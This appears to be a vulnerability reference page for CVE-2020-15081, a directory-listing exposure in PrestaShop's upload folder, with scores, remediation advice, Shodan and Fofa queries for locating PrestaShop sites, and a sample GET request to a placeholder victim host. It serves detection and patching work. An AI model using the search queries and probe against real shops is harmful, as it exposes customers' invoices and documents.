🔙 목록으로 돌아가기

CVE-2020-15081: PrestaShop < 1.7.6.6 - Information Exposure via Upload Directory

TitlePrestaShop < 1.7.6.6 - Information Exposure via Upload Directory
Author0x_Akoko
SeverityLow
ImpactAttackers can enumerate uploaded files potentially exposing sensitive customer data, invoices, or internal documents.
RemediationUpgrade to PrestaShop version 1.7.6.6 or later, or add an empty index.php file in the upload directory as a workaround.
CVSS Score5.3
EPSS Score0.21362
CVE IDCVE-2020-15081
CWE IDCWE-548
Shodan Queryhttp.component:"PrestaShop"
Fofa Queryapp="PrestaShop"
Tags cve cve2020 prestashop exposure directory-listing

🔍 Vulnerability Description

PrestaShop versions after 1.5.0.0 and before 1.7.6.6 are vulnerable to information exposure through directory listing in the upload directory due to a missing index.php file.

🌐 HTTP Request

GET /upload/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-15081.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-15081.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A